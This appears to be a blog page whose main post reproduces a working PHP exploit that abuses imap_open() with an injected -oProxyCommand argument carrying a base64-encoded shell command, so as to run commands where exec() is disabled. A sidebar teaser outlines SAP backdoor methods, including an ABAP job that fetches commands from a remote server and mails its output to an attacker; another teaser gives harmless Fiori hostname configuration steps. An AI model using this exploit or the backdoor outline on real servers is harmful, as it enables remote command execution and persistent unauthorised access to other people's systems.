Bypassing PHP’s Disabled exec()

-
Source: https://github.com/Bo0oM/PHP_imap_open_exploit

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
?>

Comments

Post a Comment

Popular posts from this blog

SAP Backdoors {placeholder Post]

-
This is a placeholder for future post, on backdooring SAP servers: 1. SAP profile SETENV_xx parameter - if get local access, or SAP level access can cat or echo a line into profile parameter file - concatenated command for SETENV_+xx param 2. Using ABAP program + SM37 - ABAP program to fetch comamnd from a remote server (HTTP-GET ABAP Function Module) - schedule job every 2 minits interval - for that job, set spool recipient to remote attacker email so output can be sent over - Pre-req: SCOT configuration, Auth for SM36, SE38 to be continued.. //alak
Read more

Fiori Apps Keep Calling Internal Hostname / Internal FQDN

-
Image
Had this issue where certain apps calls internal hostnames or internal FQDN when clicking or spawning webdynpro URL or any calling of internally hosted attachment. To change this setting, general steps as below: Check the app is using which local Alias - is it LOCAL or S4PS or S4FIn or whatever Check in /UI2/V_ALIASMAP / /UI2/V_ALIASCAT that alis is mapped to which alias. Check in SM59 under HTTP Connections to ABAP System if let say the Alias name is LOCAL, so there should be three LOCAL_xx created, which are: LOCAL_HTTP LOCAL_HTTPS LOCAL_HTTPT SO change for each of this, to the correct FQDN or hostname Hope this helps someone. //alak
Read more